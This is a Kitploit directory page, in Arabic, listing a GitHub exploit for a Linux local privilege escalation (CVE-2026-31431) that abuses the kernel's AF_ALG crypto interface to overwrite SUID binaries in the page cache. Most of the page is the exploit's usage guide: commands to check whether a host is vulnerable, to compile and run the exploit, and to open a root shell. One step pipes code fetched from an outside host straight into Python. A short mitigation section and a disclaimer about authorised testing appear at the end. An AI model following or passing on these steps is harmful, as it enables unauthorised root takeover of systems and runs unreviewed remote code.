Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
copyfail — استغلال تصعيد الامتيازات المحلية في Linux للثغرة CVE-2026-31431، عبر الكتابة فوق ذاكرة التخزين المؤقت للصفحات (page cache) لملفات SUID الثنائية من خلال واجهة AF_ALG للتشفير في النواة للحصول على صلاحيات root. | Kitploit
أدوات/GitHubGitHub/minime794/copyfail
تصعيد الامتيازاتتحليل الثغرات الأمنيةالاستغلالاستغلال الملفات الثنائية
GitHubminime794/copyfail

copyfail

استغلال تصعيد الامتيازات المحلية في Linux للثغرة CVE-2026-31431، عبر الكتابة فوق ذاكرة التخزين المؤقت للصفحات (page cache) لملفات SUID الثنائية من خلال واجهة AF_ALG للتشفير في النواة للحصول على صلاحيات root.

عرض المستودع
منذ 6س 40دلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Copy Fail (CVE-2026-31431) – دليل استخدام الاستغلال

ملف Readme الأصلي مأخوذ من @painoob

جميع إصدارات Kernel منذ 2017 / 2016 عرضة للثغرة ! Kernel 7 محصّن بالكامل، والإصدارات الأخرى (بين 5-7 قد تظل عرضة للثغرة)

⚠️ إخلاء المسؤولية

هذا المحتوى مخصص للأغراض التعليمية واختبارات الأمان المصرّح بها فقط. لا تقم بتشغيل هذا على أنظمة دون إذن صريح.


📌 نظرة عامة

Copy Fail (CVE-2026-31431) هي ثغرة تصعيد صلاحيات محلي (LPE) في Linux تؤثر على واجهة برمجة تطبيقات التشفير في النواة عبر AF_ALG.

تتيح لمستخدم غير مصرّح له بالكتابة فوق بيانات page cache لملف ثنائي SUID (مثل /usr/bin/su) والحصول على صلاحيات root.


🧠 المتطلبات

متطلبات النظام

  • نواة Linux (عرضة للثغرة – يعتمد على حالة التصحيح)
  • تمكين AF_ALG
  • تحميل وحدة algif_aead

متطلبات استغلال Python

  • Python 3.10+
  • دعم لـ:
    • os.splice
    • socket(AF_ALG)

🔍 التحقق من الثغرة

root@kitploit:~
uname -a
grep -i authencesn /proc/crypto
lsmod | grep alg

المؤشرات المتوقعة:

  • authencesn(hmac(sha256),cbc(aes))
  • تحميل algif_aead

🐍 تشغيل استغلال Python

1. التنفيذ المباشر

root@kitploit:~
python3 copy_fail_exp.py

2. أو عبر curl (إذا كان مستضافًا عن بُعد)

root@kitploit:~
curl https://copy.fail/exp | python3

3. تشغيل صدفة root

root@kitploit:~
su
id

النتيجة المتوقعة:

root@kitploit:~
uid=0(root)

⚠️ المشكلات الشائعة (Python)

❌ خطأ: os.splice not found

السبب:

  • إصدار Python أقل من 3.10
  • بناء مقيّد

الحل:

  • استخدم ملف Python ثنائي أحدث
  • ارفع مفسّر Python ثابت (static)

⚙️ ترجمة نسخة C

1. الترجمة

root@kitploit:~
gcc copy_fail_exp.c -o copy_fail

2. جعله قابلًا للتنفيذ

root@kitploit:~
chmod +x copy_fail

3. تشغيل الاستغلال

root@kitploit:~
./copy_fail
su

⚠️ المشكلات الشائعة (C)

❌ الاستغلال يعمل لكن دون root

الأسباب المحتملة:

  • النواة مصحّحة
  • إزاحات (offsets) غير صحيحة
  • عدم تطابق البيئة

❌ أخطاء الترجمة

ثبّت الأدوات المطلوبة:

root@kitploit:~
apt update && apt install build-essential

🧪 استكشاف الأخطاء وإصلاحها

التحقق مما إذا كان النظام مصحّحًا

root@kitploit:~
dmesg | grep -i alg

التحقق من الوحدة

root@kitploit:~
lsmod | grep algif_aead

🛡️ التخفيف

تعطيل الوحدة العرضة للثغرة

root@kitploit:~
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
rmmod algif_aead

تطبيق تصحيح النواة

حدّث نظامك:

root@kitploit:~
apt update && apt upgrade

📌 ملاحظات

  • الاستغلال يعدّل page cache فقط (غير دائم)
  • يتطلب وصولًا محليًا
  • غير قابل للاستغلال عن بُعد افتراضيًا

🧠 رؤية نهائية

إذا فشل الاستغلال، فكّر في:

  • النواة مصحّحة بالفعل
  • قيود البيئة
  • نواقل بديلة لتصعيد الصلاحيات (SUID، capabilities، سوء إعداد sudo)

📚 المراجع

  • https://copy.fail/
  • CVE-2026-31431

👨‍💻 ملاحظات المؤلف

استخدم هذا الاستغلال بمسؤولية في المختبرات و CTFs واختبارات الاختراق المصرّح بها فقط.

تنزيل الأداة